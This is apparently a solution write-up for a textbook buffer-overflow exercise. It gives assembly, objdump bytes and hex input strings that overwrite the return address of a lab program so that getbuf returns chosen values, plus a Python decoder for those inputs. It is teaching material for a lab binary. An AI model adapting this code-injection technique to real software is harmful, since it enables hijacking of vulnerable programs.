# Computer Systems: A Programmer's Perspective, Problem 3.38 Solution: A Buffer Overflow Attack Example (Continued, Part 3)


1. Problem description

2. Target analysis and solution

3. Verification

4. Summary

4.1 What if we want the output to be 0x12345678?

```asm
# file name: bomb.s
mov    $0x12345678, %eax    # value that getbuf will appear to return
push   $0x401158            # address at which execution should continue
ret                         # pop that address into %eip
```

```
$ objdump -d bomb.o

show.o:     file format pe-i386

Disassembly of section .text:

00000000 <.text>:
   0:   b8 78 56 34 12          mov    $0x12345678,%eax
   5:   68 58 11 40 00          push   $0x401158
   a:   c3                      ret
   b:   90                      nop
   c:   90                      nop
   d:   90                      nop
   e:   90                      nop
   f:   90                      nop
```

```
$ ./bomb.exe
Type Hex string:b8 78 56 34 12 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00
getbuf returned 0x12345678
```

4.2 What if we want the output to be 0xabc?

```asm
# file name: bomb.s
mov    $0xabc, %eax         # value that getbuf will appear to return
push   $0x401158            # address at which execution should continue
ret                         # pop that address into %eip
```

```
$ objdump -d bomb.o

show.o:     file format pe-i386

Disassembly of section .text:

00000000 <.text>:
   0:   b8 bc 0a 00 00          mov    $0xabc,%eax
   5:   68 58 11 40 00          push   $0x401158
   a:   c3                      ret
   b:   90                      nop
   c:   90                      nop
   d:   90                      nop
   e:   90                      nop
   f:   90                      nop
```

```
$ ./bomb.exe
Type Hex string:b8 bc 0a 00 00 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00
getbuf returned 0xabc
```

4.3 Some examples

```
Input:  b8 ef be ad de 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00
Output: 0xdeadbeef

Input:  b8 78 56 34 12 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00
Output: 0x12345678

Input:  b8 56 34 12 00 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00
Output: 0x123456

Input:  b8 bc 0a 00 00 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00
Output: 0xabc
```
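The four inputs above differ only in the four bytes after the `b8` opcode, which hold the returned value in little-endian order. The decoder below is an added example, not code from the original post; it splits one of these 32-byte strings into the fields seen in the listings. The names `decode_code`, `dissect` and `BUF_TO_EBP` are hypothetical, and the 24-byte offset and the meaning of the last two dwords (saved `%ebp`, then return address) are assumptions read off the input strings and the usual IA-32 frame layout.

```python
import struct

BUF_TO_EBP = 24  # assumption: bytes from buffer start to the saved %ebp slot

def decode_code(code):
    """Decode the only instructions the page uses: mov imm32,%eax; push imm32; ret."""
    found, i = {}, 0
    while i < len(code):
        op = code[i]
        if op in (0xB8, 0x68):              # opcode followed by a 4-byte immediate
            if i + 5 > len(code):
                raise ValueError("immediate runs past the buffer")
            (imm,) = struct.unpack_from("<I", code, i + 1)   # little-endian
            found["eax" if op == 0xB8 else "resume"] = imm
            i += 5
        elif op == 0xC3:                    # ret: control leaves the buffer here
            return found
        else:
            raise ValueError(f"unexpected opcode {op:#04x} at offset {i}")
    raise ValueError("no ret found")

def dissect(hex_line):
    """Split one 32-byte input string into the fields it overwrites."""
    raw = bytes.fromhex(hex_line)
    if len(raw) != BUF_TO_EBP + 8:
        raise ValueError(f"expected {BUF_TO_EBP + 8} bytes, got {len(raw)}")
    fields = decode_code(raw[:BUF_TO_EBP])
    # assumption: the last two dwords land on saved %ebp and the return address
    fields["saved_ebp"], fields["ret_addr"] = struct.unpack_from("<II", raw, BUF_TO_EBP)
    return fields

# Input strings copied from section 4.3 of the page.
TAIL = " 68 58 11 40 00 c3" + " 00" * 13 + " b8 bf 22 00 80 bf 22 00"
PAGE_INPUTS = ["b8 ef be ad de" + TAIL, "b8 78 56 34 12" + TAIL,
               "b8 56 34 12 00" + TAIL, "b8 bc 0a 00 00" + TAIL]

if __name__ == "__main__":
    for line in PAGE_INPUTS:
        f = dissect(line)
        print(" ".join(f"{k}={v:#x}" for k, v in f.items()))
```

Run on the page's inputs, the `eax` field matches each listed output, while `resume`, `saved_ebp` and `ret_addr` stay the same across all four.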
